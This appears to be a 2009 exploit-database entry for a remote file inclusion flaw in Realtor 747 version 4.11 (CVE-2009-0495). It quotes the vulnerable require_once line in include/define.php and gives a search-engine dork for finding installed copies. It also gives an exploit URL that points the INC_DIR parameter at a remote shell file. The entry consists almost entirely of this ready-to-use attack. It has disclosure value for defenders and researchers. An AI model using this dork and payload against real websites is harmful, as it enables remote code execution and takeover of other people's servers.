[] NeoSense

Realtor 747 - 'define.php?INC_DIR' Remote File Inclusion

Author: ahmadbady
type: webapps
platform: php
port: 
date_added: 2009-01-11 
date_updated:  
verified: 1 
codes: OSVDB-51315;CVE-2009-0495 
tags: 
aliases:  
screenshot_url:  
application_url: 

         -----------------:Remote File Include:-----------------
              -------------------------------------------------------


script:realtor747 Version 4.11

------------------------------------------------------------------
download from:http://www.it747.com/realtor747/intro/trial/realtor747-v4-11-trial.zip

------------------------------------------------------------------

.......................................................
vul:/include/define.php line 51:

require_once( "$INC_DIR/define_area.php" );

------------------------------------------------------

dork:"REALTOR 747 - Version 4.11"
-----------------------------------------------------

xpl:

http://127.0.0.1/path/include/define.php?INC_DIR=[shell.txt?]


***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady   [kivi_hacker666@yahoo.com]
---------------------------------------------------

# milw0rm.com [2009-01-12]